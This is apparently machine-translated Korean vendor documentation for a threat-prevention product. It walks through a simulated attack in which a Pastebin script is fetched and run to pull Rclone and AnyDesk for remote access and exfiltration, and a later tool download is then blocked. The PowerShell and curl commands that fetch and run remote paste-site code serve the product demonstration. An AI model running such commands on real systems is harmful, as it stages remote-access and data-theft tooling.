에이전트 위협 방지가 네트워크를 보호하는 방법 시연하기

Prev Next

개요

에이전트 위협 방지는 감지된 위협에 응답하여 동적 제어를 선제적으로 적용하여 공격 후면을 줄이고, 영향이 발생하기 전에 위협을 완화하는 보안 엔진입니다. 자세한 내용은 에이전트 위협 방지가 무엇입니까?을 참조하십시오.

이 문서는 에이전트 위협 방지가 네트워크를 보호하는 방식을 시연하기 위해 현실 세계의 공격 시나리오를 모의 실험합니다. 비록 이것이 에이전트 위협은 아니지만, 비슷한 기술이 에이전트 공격에서 사용되는 것을 방지하기 위해 어떻게 통제가 적용되는지를 보여줍니다.

이 예에서는 사용자가 Pastebin에서 스크립트를 다운로드하고 공격자가 미래의 공격을 수행하기 위해 추가적인 고위험 도구를 가져오려는 시도를 합니다. 에이전트 위협 방지는 악성 행동을 식별하고 도구가 다운로드되지 않도록 차단하여 영향을 미치기 전에 공격을 막습니다.

이 공격에 대한 대응은 완전히 자동화되어 있습니다. 추가 규칙이 필요하지 않습니다. 단순히 에이전트 위협 방지를 활성화하면 공격을 방지할 수 있습니다.

이 공격을 시뮬레이션 하려면:

  1. 차단되지 않고 고위험 도구를 다운로드합니다.

  2. Pastebin에서 스크립트를 다운로드합니다.

  3. 고위험 도구를 다시 다운로드하려고 시도합니다. 이번에는 다운로드가 차단됩니다.

    참고: 이 시나리오는 비연관성이지만, 비슷한 기술이 연관 공격에서 사용되는 것을 방지하는 데 제어가 어떻게 도움이 될 수 있는지를 보여줍니다.

사전 준비사항

  • 에이전트 위협 방지가 활성화되고 작업이 차단으로 설정됩니다.

단계 1: 고위험 도구 다운로드

에이전트 위협 방지는 악성 시퀀스의 일부일 때만 작업을 차단함을 증명하기 위해, 먼저 파일 관리를 위한 오픈 소스 커맨드라인 도구인 Rclone을 다운로드합니다. 공격자는 합법적이고 강력하며 일반적인 관리 활동과 섞이기 때문에 보통 Rclone을 사후 피해 도구로 사용합니다.

액션

Rclone을 다음 중 하나에서 다운로드합니다:

  • 다음 URL: https://downloads.rclone.org/rclone-current-windows-amd64.zip

  • Windows 장치에서:

    • 다음 PowerShell 명령어: Start-Process "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"

  • macOS/Linux 장치에서:

    • 다음 터미널 명령: curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

결과

파일이 성공적으로 다운로드됩니다.

설명

이것은 격리된 상태에서는 작업이 차단되지 않으며, 의심스러운 활동이 선행되지 않으면 악성으로 간주되지 않음을 확인합니다.

단계 2: Pastebin에서 스크립트 다운로드

공격이 시작되는 것을 시뮬레이션하려면 Pastebin에서 스크립트를 다운로드하세요. 이 스크립트를 실행하면 일반적인 공격자 도구인 Rclone과 AnyDesk를 다운로드해 원격 액세스 및 유출을 수행하십시오.

액션

Pastebin에서 스크립트를 다운로드하고 실행합니다:

  • Windows 장치에서:

    • 다음 PowerShell 명령: (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')

  • macOS/Linux 장치에서:

    • 다음 터미널 명령: curl -sSL "https://pastebin.com/raw/tXhVK2V7"

결과

스크립트가 실행되고 도구가 다운로드됩니다. 동적 제어가 호스트에 적용되며, 이는 에이전트 위협 페이지에 표시됩니다. 자세한 내용은 에이전트 위협 방지 모니터링을 참조하십시오.

설명

에이전트 위협 방지는 의심스러운 행동의 지표를 감지하고 후속 악성 행동을 차단하기 위해 제어를 선제적으로 적용하여 모든 영향이 발생하기 전에 공격을 중단합니다.

단계 3: 고위험 도구 다운로드

모의 공격에서 공격자는 Rclone을 다운로드하려고 시도합니다. 그러나 Pastebin에서 스크립트를 다운로드하는 의심스러운 활동을 따라, 제어가 적용되었기 때문에 에이전트 위협 방지는 Rclone 다운로드를 차단합니다.

액션

다음 옵션을 사용하여 Rclone을 다운로드하십시오:

  • Rclone의 사이트에서 직접: https://downloads.rclone.org/rclone-current-windows-amd64.zip

  • 이 PowerShell 명령어 (Windows에서): Start-Process -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"

  • 이 터미널 명령어 (macOS/Linux 켜기): curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

결과

이 파일의 다운로드는 제어에 의해 차단됩니다. 완화된 위협은 에이전트 위협 페이지에 표시됩니다.

설명

1단계에서는 이 스크립트가 격리되어 실행되어 허용되었지만, 이번에는 의심스러운 활동이 선행되었기 때문에 에이전트 위협 방지에 의해 차단됩니다.

시연

이 비디오는 이 모의 공격의 시연을 보여준다.